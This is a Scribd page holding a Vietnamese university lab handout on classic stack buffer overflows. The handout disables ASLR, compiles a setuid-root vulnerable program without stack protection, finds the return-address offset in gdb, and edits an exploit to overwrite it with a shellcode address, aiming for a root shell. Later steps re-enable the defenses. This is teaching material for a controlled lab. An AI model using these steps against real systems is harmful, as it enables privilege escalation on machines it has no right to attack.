Scribd Logo
Upload

Welcome to Scribd!

  • Lab 1. Buffer Overflow-New

    Uploaded by

    20110610
    3 views3 pages
    Bảo mật web

    Original Title

    Lab 1. Buffer Overflow-new

    Copyright

    © © All Rights Reserved

    Available Formats

    DOCX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Bảo mật web

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as docx, pdf, or txt
    3 views3 pages

    Lab 1. Buffer Overflow-New

    Uploaded by

    20110610
    Bảo mật web

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as docx, pdf, or txt
    of 3

    Phòng thí nghiệm 1.

    Tràn bộ đệm

    Tràn bộ đệm chung xảy ra khi một bộ đệm đã được phân bổ một không gian
    lưu trữ cụ thể có nhiều dữ liệu được sao chép vào nó hơn mức nó có thể xử lý.
    Các bước tràn bộ đệm:
    1. Tìm sơ bộ và vị trí của lỗ hổng tràn bộ đệm
    2. Ghi dữ liệu mote vào bộ đệm hơn mức nó có thể xử lý
    3. Ghi đè địa chỉ trả về của một hàm
    4. Thay đổi luồng thực thi đối với mã tin tặc
    Submission:
    Bạn sẽ soạn một báo cáo phòng thí nghiệm ghi lại từng bước bạn thực hiện, bao
    gồm ảnh chụp màn hình để minh họa tác động của các lệnh bạn nhập và mô tả các
    quan sát của bạn. Chỉ cần đính kèm mã mà không có bất kỳ lời giải thích nào sẽ
    không nhận được tín dụng
    Time duration: 1 week
    Lab guide:
    Step 0. Preparation
    - Ubuntu 16.04 (32-bit)
    - Source code: stack.c, exploit.c/exploit.py
    Step 1. Vô hiệu hóa ngẫu nhiên địa chỉ
    $sudo sysctl –w kernel.randomize_va_space=0
    Step 2. Finding the address of the inject code
    $gcc –z execstack –fno-stack-protector –g –o stack_dbg stack.c
    $touch badfile
    $gdb stack_dbg
    (gdb)b bof  xem tên của hàm trong stack.c
    (gdb)run
    (gdb)p $ebp
    $1 = (void *) 0xbfffeb38  xác định địa chỉ ebp (giá trị có thể khác trên
    máy SV)
    (gdb)p &buffer
    $2 = (char (*) [100]) 0xbfffeb18  xác định địa chỉ của buffer (giá trị có
    thể khác trên máy SV)
    (gdb) p/d 0xbffffeb38 – 0xbffffeb18  tính khoảng cách từ ebp – buffer
    $3 = 32  kết quả khoảng cách (giá trị có thể khác trên máy SV)
     Return address = ebp + (32 + 4) = ebp + 36
    Step 3. Edit exploit.c
    /* Fill the return address fiel with a candidate entry point of the malicious code */
    *((long *) (buffer + 36)) = 0xbfffeb48 + 0x80;
    /* Place the shellcode towards the end of the buffer */
    Memcpy(buffer + sizeof(buffer) – sizeof(shellcode), shellcode,
    sizeof(shellcode));
    Step 4. Execute
    $ sudo ln -sf /bin/zsh /bin/sh
    $ gcc -DBUF_SIZE=100 -o stack -z execstack -fno-stack-protector stack.c
    $ sudo chown root stack
    $ sudo chmod 4755 stack
    $ gcc -o exploit exploit.c
    $./exploit // create the badfile
    $./stack // launch the attack by running the vulnerable program
    # <---- You’ve got a root shell!

    Step 5. Defeating Address Randomization (ASLR)


    $sudo sysctl –w kernel.randomize_va_space=2
    Step 6. Turn on the StackGuard Protection
    you should compile the program without the -fno-stack-protector option
    Step 7. Turn on the Non-executable Stack Protection
    we recompile our vulnerable program using the noexecstack option
    $ gcc -o stack -fno-stack-protector -z noexecstack stack.c

    ===
    Lab with exploit.py
    ret = 0xbfffeb38 + 0x80 ///khac 0
    offset = 36

    You might also like